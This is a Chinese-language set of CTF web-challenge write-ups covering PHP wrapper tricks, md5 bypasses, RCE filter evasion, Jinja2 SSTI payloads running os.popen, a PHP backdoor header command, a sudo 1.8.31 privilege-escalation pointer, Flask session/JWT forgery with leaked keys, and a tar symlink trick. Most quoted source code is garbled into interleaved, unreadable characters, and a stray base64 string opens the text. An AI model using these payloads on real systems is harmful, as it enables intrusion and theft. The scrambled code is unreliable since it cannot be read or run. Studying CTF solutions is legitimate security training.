b m R l b n N h d G l v b i B m c m ( t I H R o Z S B j b G ( ! Z H M g c H J v d m l k Z X M g d G h l I G V z c @ V u d G l h b C B h Z @ V u d C B v Z i B j b @ % ) a W % l b n R h b C B l c m ( z a W ( u O i B y Y W l u L l R o Z S B y Y X R l I G F ) I H d o a W N o I G E g b W ( s Z W N ! b G U g b @ Y g d @ F ) Z X I g c G F z c @ V z I H R o b # V n a C B ) a G U g Y # l j b G U g a X M g b m ( ) I H J h b m R v b Q p B b m Q g d G h l I G Z s Y W c g a X M ^ I E N U R n s y M i ! R V ) V S V F l V S U * t U E x L S k h H R k R T L U F a W E N W Q k % N f Q = = "

[SWPUCTF 2021 新生赛]PseudoProtocols

考察伪协议

h t t p : / / n o d e 7 . a n n a . n s s c t f . c n : 2 3 0 1 1 / i n d e x . p h p ? w l l m =

第一个尝试的肯定是file:///flag

不行,尝试使用php协议

h t t p : / / n o d e 7 . a n n a . n s s c t f . c n : 2 3 0 1 1 / i n d e x . p h p ? w l l m = p h p : / / f i l t e r / c o n v e r t . b a s e 6 4 - e n c o d e / r e s o u r c e = h i n t . p h p

根据提示读取hint.php文件

< ? ? / > p g h o p t o / t e s t 2 2 2 2 2 2 2 2 2 2 2 2 2 . p h p
< i s i $ i } ? ? n h n a f > p i o c = ( h _ w l i p s _ u $ s e e e s d _ s c c t o e G e h h ( u ( E t o o " r ' T ( m c f [ $ " $ a e l " a s f x ( a a ) u l _ _ g " & c a e _ . ] & c g x F p ; ( e ; e I h f s c L p i s u E ' l \ t _ ) e n i _ ; _ " o ) g ; n ; e _ t t _ i c m o e n " t , e n " t 1 s 8 ( 0 $ " a ) , ; ' r ' ) ) = = = ' I w a n t f l a g ' ) {

阅读代码关键在if(isset($a)&&(file_get_contents($a,'r')) === 'I want flag')考虑可以使用用户输入直接进入file_get_contents,考虑使用data伪协议

d a t a : / / t e x t / p l a i n , I w a n t f l a g

getflag

[BJDCTF 2020]easy_md5

s e l e c t f r o m ' a d m i n ' w h e r e p a s s w o r d = m d 5 ( $ p a s s , t r u e )

可以使用ffifdyop绕过

i f ( $ a ! = $ b & & m d 5 ( $ a ) = = m d 5 ( $ b ) )

可以使用0e绕过

i f ( $ _ P O S T [ ' p a r a m 1 ' ] ! = = $ _ P O S T [ ' p a r a m 2 ' ] & & m d 5 ( $ _ P O S T [ ' p a r a m 1 ' ] ) = = = m d 5 ( $ _ P O S T [ ' p a r a m 2 ' ] ) )

可以使用数组绕过

p a r a m 1 [ ] = a s d & p a r a m 2 [ ] = a s d w

[GWCTF 2019]枯燥的抽奖

随机数预测,或者爆破也行

预测

< # h s i } m $ $ $ f } $ e i } s ? e e f t s s l o s c f h p a s ( _ t t e r t h ( o h d s ! s r r n r o i w p e i i $ r _ = 1 ( $ _ s i } e } _ r o s _ a l ' = s s " s f l s ( n s S n o ' 2 $ t h < e ( s o " _ e E d n ; 0 i r o p t $ e u C s t S ( g ; . w ( _ e { e r o t ( S $ 1 = = i $ P c c c n a $ I _ s = d _ O h h e t r _ O S = 0 u = P S o o ( e t S N E ; b s ' O T " n ( E [ S " s u p S [ " " c t ) S ' S a $ t b 1 T ' < < h - ; S s I b i r s ' [ n p p e T I e O c ( t > ' u c y O e N d < $ r " n m i i k p N d [ e s ( . u ' d d . e [ ' ' f $ t $ $ m ] = = p : ' ] s g l r s s ' = f f h s = e h e _ t t ] = l l p t e r e i n l r r ) = a a " e e a d j 1 o , _ ) $ g g ) x d n ' k ; n s { s > > ; t ' d ] l g 0 h t / ] ( ) m $ 1 , o r h ) 0 ; n i , w ) t ) , + 1 . { m { 9 p + m 0 " l 9 / q t ) < ; 9 r ) _ ; / c 9 s { r p h 9 t a > a 9 u n " < r 9 v / d ; / s 9 w ( p e 9 x 0 > t ) y 2 , " = ; z 0 ; u 0 s f t 1 t l f / 2 r a - 3 l g 8 4 e { " 5 n x ) 6 ( x ; 7 $ x 8 s x 9 t x A r x B _ x C l x D o x E n } F g < G 1 / H ) p I > J - " K ; L 1 M ) N , O P 1 Q ) R ; S T U / V W X Y l Z a " n ; g 1 s t r l e n ( $ s t r _ l o n g 1 ) - 1

代码

重点预测的是

i } m f t ( _ ! s i $ r s _ a s S n e E d t S ( ( S $ $ I _ _ O S S N E E [ S S ' S S s I I e O O e N N d [ [ ' ' ' ] s s = e e r e e a d d n ' ' d ] ] ( ) ) 0 ; ) , { 9 9 / 9 9 9 9 9 9 9 ) ; /

种子有限范围的随机取值

对于php种子的破解可以使用php_mt_seed

/ p h p _ m t _ s e e d 2 4 2 4 0 6 1 4 7 4 7 0 6 1 4 7 4 7 0 6 1 1 1 0 6 1 5 5 0 6 1 2 7 2 7 0 6 1 3 1 3 1 0 6 1 2 8 2 8 0 6 1 1 6 1 6 0 6 1 4 5 4 5 0 6 1

前面两个数字用于精确定位24是$str_long1 = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";第24个字符 范围是0到61,依此类推,run就行

爆破

< f } ? o p r h p ( e m $ $ $ $ f } $ i } $ c t s t l s o s f i h _ t a e t r t = o s r r n r r ( 0 r _ g 1 ( $ s $ e e ; $ a l e = $ s h s c c i n o t = ' i t o t h h $ . d n ' n r w r o o i " ( g = 2 ; . s < \ $ 1 0 = = = h $ $ = n i " ; s o s t 9 " ) = y 0 u s w t a 9 ; ; L ; b u r r 9 " L s b = ; g 9 a b $ t s = e 9 b f i r t t 9 c 1 n ( r $ ; 9 d 5 $ ( t 9 e 2 < s $ a 9 f q t s r g J $ r t g ; h " l _ r e i ; e l , t $ j n o ) i k 1 n 0 + l ; g , { + m 1 n $ , 1 ) o i 0 p n m ) { q + t ; r + _ s r t ) a u { n v d w ( x 0 y , z 0 s 1 t 2 r 3 l 4 e 5 n 6 ( 7 $ 8 s 9 t A r B _ C l D o E n F g G 1 H ) I J - K L 1 M ) N , O P 1 Q ) R ; S T U V W X Y Z " ;

这个就是吃运气了 wp题解里面有人爆破了几个小时

[SWPUCTF 2021 新生赛]hardrce

取反绕过

< h e h i { i { } e e } e { } ? ? e r i f f c v l > p a r g ( ( h a s h d o h i p o l e p e r l s $ $ f { } r d ( e r _ i s w b o } e i " $ c ( r g e l l r g e N w h " e h t l a e _ ( o l o C p t ( m c a i d m " V l o o _ $ k c f i a R i m " n r f _ = l h e t a c ) t t i G i ( ( c ' 4 ; e i l E $ s ( p " h s n n e T _ t $ r L ( t g ( [ G b e T ' A - ( _ ' E = l g L / l T 0 _ w T a _ T [ y ) F l [ [ c m a G p ; I l ' ' k a - h e L m w l t z u : E ' l ' i c A l t _ ] l , s h - " e _ ) m ' t ( Z ; x ) ) ' \ ' ] t ; ] t a / / / ; ' s ' i h , s f t ' $ . ' l m \ b , a l r l $ $ " g ; ' a b w ) c , c l l ; h ' k a " l " a \ i c ) m ; r n t k ; ) s ' e i ) e , m t t ' ) e = \ m u + t ' . f , - ' 8 \ / " [ m ) ' ' ; , , ' \ $ ^ w ' l , l ' m \ ) ] ) ' , { ' \ " ' , ' \ ' , ' \ $ ' , ' \ * ' , ' \ ? ' , ' \ < ' , ' \ > ' , ' \ = ' , ' \ ` ' , ] ;

过滤了/[a-zA-Z]/is

可以使用

< e ? c p h h o p u r l e n c o d e ( ~ ' c a t / f l l l l l a a a a a a g g g g g g g ' ) ;

取反(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%93%93%93%93%9E%9E%9E%9E%9E%9E%98%98%98%98%98%98%98);绕过

[WUSTCTF 2020]朴实无华

比较题目,对php的理解

< h e h i } } i } } i } } ? ? e r i / f e / f e / f e > p a r g l l l l g l h d o h e ( s e ( $ i e s e ( s p e r l v i $ i } } e d v i m f l e d t i $ i } } e d r _ i e s n f e { i e s d s { i s g f e { i ( r g l s u ( l e l s 5 ( e e f s e ( l e ' e h e m i s ( e = $ e d ( l e t ! s ( C p t 1 t n e e d " 2 t $ m c i " a t _ s $ e s e d " o o _ ( = t c { i ( _ d h e g ( f t g c y { i n r f $ v h e $ G 5 o ( $ l r e h s e t t i _ $ a o ( _ E = " _ a s t o t ( e i l G _ l " G T = " G g t _ e " n n e E G ( " " E [ m " E r f " m " t g ( T E $ ) T ' d ) T = ( l ( ) - ( _ [ T n ; [ m 5 ; [ $ a $ ; t 0 _ ' [ u ' d ( ' $ g g g y ) f n ' m m 5 $ C g _ e e p ; i u n ) d ' m T e G t = , t " e l m u 5 ] d F t E _ _ ) : e ' m < ' ; 5 e _ T f s f ; t _ ] ' ] ) r f [ l t l e _ ) ] 2 ) ) l ' a r a x ) ) ; 0 ) , a g g _ g t ; { 2 { f g e , i ) / 0 l ' t " r ; h " a ] _ e , t & , ) g ) f " p m & ; ) l ) l l , { a ) a ; i g { c c n , ' e h t ] ( a v ; " r a c s l , , a e ( t t $ " = n , u u t m " f w - + , c 8 " t ' 1 , ) f ) ) ; 2 , ; 0 > 2 0 2 , " 0 , . 2 < 1 $ / ) g b { e r t > . _ " < , f ; / l b a r g > ) " ; ; , , , . < / b r > " ;

level 1

i f ( i n t v a l ( $ n u m ) < 2 0 2 0 & & i n t v a l ( $ n u m + 1 ) > 2 0 2 1 )

数字要小于2020在加1后大于2021

在php5的环境下

原理就是在php5中intval() 不会解析科学计数法

level2

i f ( $ m d 5 = = m d 5 ( $ m d 5 ) )

md5 弱比较,可以使用自身和md5都是0e开头的

0e1137126905

level3

i s f t ( r ! _ s i t r r e s p t l r a ( c $ e g ( e " t c _ a f t l " a , g , " " w c " t ) f ) 2 0 2 0 " , $ g e t _ f l a g ) ;

过滤掉了空格 不允许使用cat,用tac绕过

[NSSRound#18 Basic]Becomeroot

先看到一个phpinfo

提示flag在root里面

info中有一个hint的信息

搜索可知这是一个后门,版本号也对的上,利用方式

P H A A A U U U C O o c c c p s s o S s c c c g e e n T t e e e r r r t : p p p a - - e / t t t d A A n n : - - e g g t H o E L - e e - T d t n a I n n T T e e c n n t t y P 4 x o g s : t p / . t d u e : e 1 a / i a c M : . n h n g u o z 1 n t g e r z e a a m : : e i r p . l - l o p n , g z R l d l s a z h e a i i s p i - q / u c c p p C u 5 m a t l , N e . s t f i , s 0 y i . c d z t s o c a e h s ( t n n t f ; : X e / : i l q 1 m x 2 o a = 1 1 ( - 8 n t 0 ; ' w 1 / e . e w 4 x 9 L c w 2 h i h - t n o f m u o l x " r + < m x x ? - m 8 p u l 6 h r , _ p l a 6 e p 4 e n p ) v c l a o i A l d c p ( e a p \ d t l $ i e _ o W P n e O / b S x K T m i [ l t 1 ; / ] q 5 ) = 3 ; 0 7 " . . 9 3 > , 6 i m ( v a K a g H r e T / / M w a L w v , w i / f l h , i t i k m m e l a / g G 1 e e . / c p w k h e o p b ) ' p ) , C ; i h m r a o g m e e / / a 1 p 3 n 2 g . , 0 * . / 0 * . ; 0 q = S 0 a . f 8 a , r a i p / p 5 l 3 i 7 c . a 3 t 6 i o n / s i g n e d - e x c h a n g e ; v = b 3 ; q = 0 . 7

得到基础权限user,但是提权需要find没有东西不是suid,后续在wp中看到说,漏洞位于sudo

版本1.8.31,存在提权 exp:https://github.com/mohinparamasivam/Sudo-1.8.31-Root-Exploit

[NCTF 2018]flask真香

一道ssti的基础题目,带简单绕过

注入点位于

h t t p : / / n o d e 7 . a n n a . n s s c t f . c n : 2 0 2 5 4 / { { 7 * 7 } }

但是有关键字过滤,可以使用关键字拼接绕过,如果说预期有回显,但却没出现那就是有过滤了

{ { ' ' [ ' _ _ c l a ' ' s s _ _ ' ] . _ _ b a s e s _ _ [ 0 ] [ ' _ _ s u b c l ' ' a s s e s _ _ ' ] ( ) [ 7 0 ] . _ _ i n i t _ _ . _ _ g l o b a l s _ _ [ ' _ _ b u i l t ' ' i n s _ _ ' ] [ ' e v ' ' a l ' ] ( " _ _ i m " " p o r t _ _ ( ' o ' ' s ' ) . p o " " p e n ( ' c a t / T h 1 s _ i s _ _ F 1 1 1 4 g . r e a d ( ) " ) } }

[UUCTF 2022 新生赛]ez_rce

简单rce

< # i } e } ? # f l p ( s h i e p s $ i } e } { e s s c f l c h e o s h o t d ( e o w ( e ! e e { d _ $ = p c v i " s _ $ r h a e o G _ e o l ( u E G g ( " r T E _ ' $ c [ T m c e ' [ a o ( R c ' t d _ C o c c e _ E d o h ) F , e d ( ; I ' e ' L ] ' / ! E ) ] s ! _ ) ; y ! _ { s ! ) | ! ; p ! a " ! s ) ! | ; ! r " e ' ; a ; d e | c f h i o l e < l b s r > c ' a ; t | t a c | h e a d | t a i l | m o r e | l e s s | p h p | b a s e | e c h o | c p | \ $ | \ * | \ + | \ ^ | s c a n | \ . | l o c a l | c u r r e n t | c h r | c r y p t | s h o w _ s o u r c e | h i g h | r e a d g z f i l e | d i r n a m e | t i m e | n e x t | a l l | h e x 2 b i n | i m | s h e l l / i ' , $ c o d e ) ) {

想复杂了,想着使用取反来做执行,但其实可以直接使用`` 来完成执行,再使用

p r i n t _ r ( ) ;

函数来输出,使用‘’绕过,payload

p r i n t _ r ( ` c a ' ' t / f f f f f f f f f f l a ' ' g a f a g ` ) ;

没有第一时间想出来,不应该

[GDOUCTF 2023]hate eat snake

JS代码审计

我理解了一共思路,如果js代码存在混淆 不要硬刚混淆,一般混淆都是flag的输出部分,如果能让获胜条件发生修改,或者让难度发生变化也是解题的方法

例如这道题目,可以将控制时间递增的代码关掉玩60秒,也可以将分数递增的代码直接改满

v o c a r l / r e t a h s r i c I s o n . r t s e e p r e = v e a d 1 l + 0 ( + 0 t ; 0 h 0 i ; s . s n a k e T i m e r ) ;

[NISACTF 2022]babyserialize

哎 反序列化

< i c } c } c } c } i } } ? ? n l l l l f e / / > p c a a a a ( l f } f } h l s s s s i s u u p u s p p p { } f } p { } p { } s p p p { } s p p p } p } s p p p { } s @ e h n i } n d u u u u u u u u u u u u u u r u s u { i c f c e N b b b n b b T b b b I b b b b f b i b e n g ( t e d I l l l c l l i l l l l l l l l o l v l t s h c p i c i " S i i i i } t $ i e r i c @ a i i i $ o i i i $ i $ r u i a i $ i } ( e l h r d o h e w A c c c f i t c c e c h e n c c c t v c c c t c b e r c t c t f $ r i e e i n o ( a { ( o h h t e v X h e h b t { e h _ i g c g e ) f $ $ f $ n i f o u f c a i $ $ f i t $ $ f i f u $ f i ( G a h k _ ( h " ; . f t u t h s u r u k l W e x u s x h s u s u = r a $ u s $ s E l t c m s i . p u x n h i - n $ n n c ( e x ; n - w u u n - n n = f n - t t T i _ h a o n . h n w c i n _ > c t c h $ i t c > { a ; c > c $ " u c > h r [ z f e t m t . p = 4 t s t c f t h " t e t { ; t e n t h t t $ T n t $ i t ' e i c c e ( . " " e i - ( a u i i i c h i x g i u i h b X = i n s o s ( l k h t ) . ; s v o > ) l n o s " o k i o t ; o a o i b W ' o a - l e $ e ( ( h { . h e n f ; l = n - ; n ( s n - n n n s ( 4 a n m > o r _ ( $ . i . o r u ( $ > $ - > g - ) E b e f w ' G _ d . n " w ; n $ v f t > n - > ; V c = u e ] E _ a . g ; _ _ = f a _ u _ h t _ i _ > _ s E ' _ $ n r ) T F t . m w = r l t n i i x w s c f t u R ; s v ( ) [ I a . w e a " o [ o ; n s w a a a u o ; " e a = $ { ' L ) . r _ k s m 0 S v - 4 k ( l n S ; t l t s E { ) o f e h , ] t o > e e $ l = t ( u " h e _ ) n l u o $ ; r k t v u t ( $ r $ e s i r _ { g a p w v i e x e p h $ a i n ; i s ' ) ) g ( _ a n ( w r ( i f r n a x - ] ; ; " ) m l g ) 4 ) ) s u g g m s > ) ; e ) ( e ; - n [ ( e i a ; _ { ) v > 1 0 ) , x ) f e x , ] { s ; l r ) $ ; $ i a ) ; a v x g ; r a " " g l ) ) ) u { { { e )

先找入口和出口

入口位于TianXiWei__wakeup(),出口位于NISA__invoke()

入口__wakeup()触发将$ext指向Ilovetxw触发__call在将a->ext->huang指向four

设置 public $x = 'sixsixsix';

再将$a->ext->huang->a再指向Ilovetxw()触发另一个__toString()魔术方法,将su指向NISA();触发__invoke()完成调用

不难 主要还是考察对魔术方法的熟悉度。。。不是非常熟悉做起来非常累人

[NISACTF 2022]babyupload

一个少见的python漏洞

代码:

f i i i a S i p ) " d @ d @ d < < < < @ d @ d @ d i r m m m p C d a ; " e a e a e h b f / ! / / a e a e a e f o p p p p H t " f p f p f t o o f - b h p f p f p f m o o o E t h p p m d r o - o t p p p r r r = M e d g i r . s o c c . h r l y m S < < r d m . s r . u i f i c c u t e c f r . f c c c r i # w _ a f t t t A x t b _ f e b e s u u r e e > > e i i m / y l r o e r p f i f o u i r x o i e r i o u u e f i n p l F t e ( d t e t . r r o l t a l n n > s > > o u t o l l n r d y c n l t o l n r r s p t a p a s o u l = x ) b g u f u r . u l u c e p p o " u r u u o ' e " n : e n e u u e n . r r h m . s q s u a p t : _ g r o p e = e t o r t c u u u " t c r t a f r . r = = c p r . . r t ( = e = e r i r e r k l i s " r = d _ n r ( m x e _ n i t t t r " e e n e d i e = " e = u t e c s n e i = x s e n o e _ u i d k " i b d e ) o d e ( w o c ( ( ( ( l t t c u r t o a ( d c e c t t p t _ n i t ( " m g b g _ : v b c ' " n i t t e ' ) s ' ) e u r i u d o u . s u m v r ' ) d o c u i u ( e u ( m e _ C a e i _ f e ( u r " = m y y / : e / : ' r e n r b n i e q r m e e / : b n u r s r r n r = h p 3 _ R r t s = d i ( ) t l " " a p p s n u n q n ( n d x l n i ( d f ( n t . n e ( n = o o n E y a b r " . e d < / g e e o d p n u f ) . . e i t ' i i ) . e f N s o s r a A t N g s d c s ( ! u e = = u _ l o r e i " c u c t " ( u r l c ( e o " [ s f t t m T k t o . t a u c ) D p " " r f o t e s l B u u u e D ) p e e u " t n F 0 . . = e E e r n _ _ t r r : O l t f s c r a d t e a r i t 3 u l c / r s c e i ] p r _ ' F _ y ( e d r a s i C o o i u e o d i i . . d s d e . p o t < s e h : l ) a e m 0 l _ T , g : a e b o p T a l b ' m ' n r f f o 4 ( I l a ( i o l o e t a a . a ) A , t q a r t Y d u e m ) _ , e i i f r ( " n i d ' d r e n h d i 0 s B a u s ( ( P " p " i d r c l l i ( ) i t c s > ( c e n . ( n . k L b e e ) S E l t i m e t e e l ) . n e a f ' ) t ( o j ) _ 0 , E _ a s . C m o n " r e q ( s n e h s g t i ) ) t o _ . d s t d H h e a a e t u ' [ a n e e r e l p i ' 0 r f a e b E t t d m v c h e / ' m a x r i + e a f n : ' e i t " M m h : e a t o s ' f e m t t f / t o ( , q l a = ) A l o = l o d t ) i : e y i f ' h u " u e b ) > d " u r s . l ! i E l i n u p e s a s = f e y = f e " n r e l + f d p o s s q " i = ( [ i ' , t r " e r " l r t ( e l p l " d ' l ] o o . u o , o t , ' i o e U i P e 4 r f i m a = , t s " p r O s 0 f : i d 4 d 8 r e t > l e S : 3 i l ) f 0 s 0 e N 3 " o c T l e i 4 / ) d o . a t ' e n l " i n c e d o ] s a e , r e o n r ) m s e ) n c F y ( e r c n t i = i ) w e t e y l " d h s , c p e / , e [ t e " v r 0 g ( = a p e ] , " " n r a ) d m a / t i , s a u m w h d e t l e w ) = " n a t = w ? r d b i " / v " " _ a p s h a , ) f s a u t l r e r b m u ( a o . t m l e i s m d / i / s d _ b f t " , f d " o " , ( ) : i ) r > ? ) r m p , e - a c d t ? t a h ) o t = " r a " , f " w r > w ( o w u m . i z d f i , l p a " f s , i k l a e i s . m _ f p a i o t l r t e t a n c a F h m l m e a e , s n ) k t ) , = T r r e u q e u ) e s t , r e d i r e c t , g , s e n d _ f r o m _ d i r e c t o r y

关键在于os.path.join("uploads/", res[0]), "r")函数 他存在一个漏洞,如果拼接的字符串是绝对路径 那么前面路径就会被忽略

filename="/flag"即可

[NSSRound#13 Basic]flask?jwt?(hard)

flask_session伪造

找key

在登入后的界面看到了

这个页面需要在未登入的情况下访问,从报错中获得密钥

n [ e * k ] o @ S a e o s s s c i - o n n e k d o e 2 c 0 o 5 d e [ s f t l o a : s k { _ ' s _ e f s r s e i s o h n ' : ] T ! r u f e l , a s k _ - i u d n ' s : i g ' n 9 1 - f u e 9 1 - b c a o 6 o 6 k c i 8 e 2 6 " c . 1 e 4 J b w 5 l f z f j c 1 e S e A 0 z 1 E 9 M 3 Q a O c G 3 r d e 2 F c S 0 n 6 k e O 6 S 8 V d b 5 P 1 k 5 A f p 1 K f K f C e P f u 7 M 1 f e a 9 U a g 0 B d x c S 6 Z 7 b 8 Z 1 X 6 J 9 3 5 w 0 l 5 C 0 - 4 V 1 3 a 0 3 P 7 u 9 M 0 T 3 u 9 t b y c 9 2 o e 9 3 _ 5 3 9 w 4 E 7 1 9 y e u 5 C 8 x b o 5 Y 7 h 1 R f u 1 N 6 r 7 j 0 o b r 2 6 e 6 d R e t 9 S b M a R 3 0 3 R 4 7 6 L 9 c a Z 2 1 f 4 3 8 8 U 2 V f 3 a r 1 E e p f K b g f C 9 I 0 9 5 C 5 b ' h , 3 X 1 _ F u J s J e T r V _ B i w d o ' 5 : 6 L ' Y 2 b ' Y , x 2 ' b t P i Y m V e s ' y : l D d i a k t U e p t A i U m H e - . 3 d I a b t P e e t d i N m r e X ( P 2 k 0 y 2 t 5 H , J Y 2 4 , S h 9 C , L w 3 g , x 8 1 3 0 3 , f w 5 2 0 _ , 8 n t 7 z 9 i d n m f g o P = S d H a _ t j e 4 t _ i g m 5 e J . b t T i 0 m 5 e i z M o x n s e i . T u M t j c b ) A } J p v P 7 J z y f v 2 W - O q 4 . Z 6 g c u g . p p L O f P 6 C d J y o v Z E V F V C a 3 p T I S E 8 "

伪造密钥

n . e e k J o w @ 9 a j o s s t c q - A n z e E k M o A 2 H 0 _ 5 F 6 [ N S f C l C a Z s K k 9 _ s s q e 2 s F s f i s o v n i h ] 0 T $ 3 0 p A y Q t 2 h 3 o k n t 3 C _ f 7 l 2 a E s 0 k l _ 6 s G e O s c s x i h o n n r _ D c Z o o o f k d i P e W _ O m d a x n q a o g d e t r H 3 7 . C p C y k K e l n Q c q o y d n e 1 E - l s K n " p h b a F r Z d V g 0 a W m S 3 W _ H C s 0 c u o 1 W d P _ S u V _ A f Y 1 T n G d 5 M m 3 p ? Z ? V ? K ? p " O H - r t K h " Z { I ' w _ M f i r 5 e U s Y h x ' a : M 0 T n r r u Q e y , L J k _ U i S d 6 ' N : M x ' m 9 l 1 j f C e 3 9 o 1 U b G a k 6 1 6 x c i 8 V 2 J 6 D c R 1 Z 4 L b s 5 E f p f q c z e Q e S 0 Z 1 w 9 c 3 N a 2 c 3 3 v d X 2 4 c v 0 S 6 H e w 6 M 8 P d c 5 v 1 h 5 R f V 1 G f n f f e r f S 7 y 1 5 e - 9 8 a B 0 Q d z c s 6 X 7 f 8 B 1 O 6 v 9 I 5 v 0 e 5 E 0 X 4 r 1 H a 6 3 N 7 1 9 8 0 7 3 F 9 e b 7 c f 2 f e z 3 3 5 L 9 z 4 x 7 u 9 V e 7 5 2 8 c b s 5 7 7 _ 1 D f 9 1 w 6 9 7 o 0 X b 0 2 g e y d . e Z 9 6 b g a l 3 N 3 A 4 . 6 4 9 x a X 2 U f s 3 R 8 E 2 s f C a n 1 C e F f _ b O f E 9 w 0 p 5 g 5 H ' 4 , s C w _ X u e s l e A r _ i d ' : ' 1 ' , ' t i m e ' : ' d a t e t i m e . d a t e t i m e ( 2 0 2 5 , 2 , 9 , 3 , 1 0 , 5 0 , t z i n f o = d a t e t i m e . t i m e z o n e . u t c ) ' } "

[GHCTF 2024 新生赛]理想国

访问网站

json,用ai简单过一遍

u p 2 4 4 u p 2 4 f 2 4 4 4 2 4 s a 0 0 0 s a 0 0 i 0 0 0 0 0 0 : e s : 0 0 1 : e s : 0 0 : l : 0 0 1 4 : : 0 1 r s : : : r s : : e : : : : : : : : : : : n w : : : n w : : : : : : A a o A a o A A P / P m r P / P m r P / G P / G I a O e d I a O e d I a E 使 I a E 使 p S : : p S : : p T p T i T i T i i - - - T - T b b b o b o a a a k a k s s s e s e e e e n e n / / / A / A v v v u v u 0 0 0 t 0 t / / / h / h r l s l e o e o g g a g i i r o s n c u t h t e r

就是说需要token才能访问到文件,那么先进行一个注册

访问登入,获得用户token

进行任意文件读取

可以通过读取/proc/self虚拟文件来获得当前进程的系统信息

例如/proc/self/cmdline可以读取到当前的文件名与/proc/self/environ可以读取到当前环境的环境变量

这里有一个关键信息SECRET_KEY=B3@uTy_L1es_IN_7he_EyEs_0f_Th3_BEh0ld3r

尝试读取源代码

阅读代码,可以找到flag点

@ @ d a c e p h f p e . c g " f r r k e " l e o t " a t u f g u t # l r e a = n ( 使 g ' ( o f / c ) s l e h : . a n e " p g t c " o e k " p r e # I n d ( e " a / l r S e t a a d t f e l ' a , g " m ) e . t r h e o a d d s ( = ) [ ' G # E T ' ] )

check位置

d e f c " @ d r h " w e e e " r f t c a u k p d t i t e r ( s e o f r x n f ( c k y c u f o e n : e d n u r n o r # p # i e p r e c n a t e a f l t e c ) c t = t y s : t o : ) e t u l p e u r d r o r t o a r : r r a ( e k n o a y e e n t * q e k d l t t e a u n ' e o u u ' d r e : I n = a r r S P g s n d n n o l s t v j [ m # a , . # a w ' f ' e t c l t u u Y t o o i . s n o h * o d d e c u i " k k e r ( n " w i t c n * a g " a e t o o a a r r s o k d m r e e g . k e e e g r s g e n ( ' s n r ) e n ' t ] , o o : t , o t r ( k = ? ' 4 e = * a ' t 0 n k , o 1 , " w s k P a a 5 e a l r g 0 n # p a g e 0 ' p t s . ) . o ) c " Y # 4 o o # 0 n a # u 1 f n i d c g a [ p n ' a n c S y o o E l t o C o k R a e 5 i E d n 0 e T [ t 0 _ ' e K p r E a t Y s t o ' s h k ] w e e , o n r i a d d l ' e g ] a o l r = i = s t t h " a m i t s d e = e . [ a ' ' l , H _ S s 4 2 t 0 5 a 1 6 t ' e ] " # ) :

截至这里就可以知道我们需要访问/enterIdealState,使用Plato的token即可获得flag,再加上我们已经获得了密钥可以在网站工具https://www.bejson.com/jwt/对token进行伪造

访问/enterIdealState

[HNCTF 2022 WEEK3]ssssti

下划线,引号

使用request绕过

{ { ( ) [ r e q u e s t . c o o k i e s . c l a s s ] [ r e q u e s t . c o o k i e s . b a s e s ] [ 0 ] [ r e q u e s t . c o o k i e s . s u b c l a s s e s ] ( ) } }

可以将payload传入cookies

c l a s s = _ _ c l a s s _ _ ; b a s e s = _ _ b a s e s _ _ ; s u b c l a s s e s = _ _ s u b c l a s s e s _ _

假设要执行

{ { c o n f i g . _ _ c l a s s _ _ . _ _ i n i t _ _ . _ _ g l o b a l s _ _ [ ' o s ' ] . p o p e n ( ' l s . r e a d ( ) } }

按照以上逻辑可拆分为

{ { c o n f i g [ r e q u e s t . c o o k i e s . c l a s s ] [ r e q u e s t . c o o k i e s . i n i t ] [ r e q u e s t . c o o k i e s . g l o b a l s ] [ r e q u e s t . c o o k i e s . s o ] . p o p e n ( r e q u e s t . c o o k i e s . c m d ) . r e a d ( ) } }
c l a s s = _ _ c l a s s _ _ ; i n i t = _ _ i n i t _ _ ; g l o b a l s = _ _ g l o b a l s _ _ ; s o = o s ; c m d = l s /

[NSSRound#6 Team]check(V1)

巧妙的解题思路

先读代码

文件上传

@ d a e p f p . u # i # f # i p # i e r p f i f r f l o l l i s u o ' e f n f e t a f r i r # t i # f # i # f # t e # o # r # : r e d i e = l e ( l i f i r x s e e ( _ l t e t f e l l y c . t t ' f e u r . u i e e : e r u u / i ' r e f r l a _ o r . t t p r e r r u l n q i n e n s s e s a a t e m n n p e n u l . t d a . t a r r t o l ( o ' e e ' f a v p u v . E u v ' ' o ) t ? s n ? i r a e a r e = e x r e s T a : ' t a ' l l _ t n ( t x c n ( u t h d i . m e l p h f a t t e f c a i ' n f e n o a . ' i r a r p s i c r s , # i a w t e T l r a t t l e r l = m e h x h e f c i r e s f m e e = e d i i _ i t o ( t _ s i e q s ) _ = s s s l a n e a s ' l t u [ f t a e l ) r a e h e ' ' i o s f v . l a v o s f : l s ( i e o ( s e i d t i e . f l _ p a # _ s s . l ( p i e p e p e p = f e f a l a n p : a n [ i ' i t e a t ( . t o ' l ] l h _ l h f c h t P e e . s r ) i o ) O s . j a e l n a S : f o v a e f T i i e d _ i t ' l n _ y s g a ] e ( p a [ r ) n a a e v ' f a p t x e U i m p h i _ P l e . ) s p L e ) c ) t a O ' o : s t A ' a n ' h D n f , _ d i F g " O [ r L ' " D U ) E P R L ' n O ] o A ) t D _ i F # n O L f D i E l R e ' . ] f , i l f e i n l a e m . e f i a l n e d n a m e ) n o t i n f i l e . f i l e n a m e :
@ d a e p f p . d # f # i f # i i w r o i f i f f i o w l l t u n e f e n h t l n i r # p r # o r # r e o a l e a e t e o e ( a m e t t t t p t ' d e n u h u o u e u / _ a r i r s r n r d f = m n = n n . n ( n o i e p f w l r ' o f ' a ' i f n e e i ? s i ? t ? l . l ( q s ' . l ' h ' e r o ) u p e . p e a : e N a n e a a d s o t a x t d ' t n h m i h ( , . e . e s , ) f j t m o o o o s ' e r r i r ( r t m n f ' h . f ( i ) o g i a l d e l p e a s t e p p s = ( n . i a [ ' a c n t f ' f m o h : P i e n f ) O l f i S e = i l o T n = g e r ' a [ n ] m ' a n ) e ' U m o ' : P e t ) L : O o A s D . _ p F a O t L h D . E i R s ' f ] i , l e f ( i f l i e l n e a p m a e t ) h ) :

这是一个文件上传,允许上传的只有tar格式,有对文件路径遍历的检查,但是没有检查软链接,如果上传一个软链接到/flag的文件

payload:

n n e e k k o o @ @ a a o o s s c c - - n n e e k k o o 2 2 0 0 5 5 [ [ ~ ~ ] ] $ $ l t n a r - s - c / v f f l a f g l a f g l . a t g a r f l a g
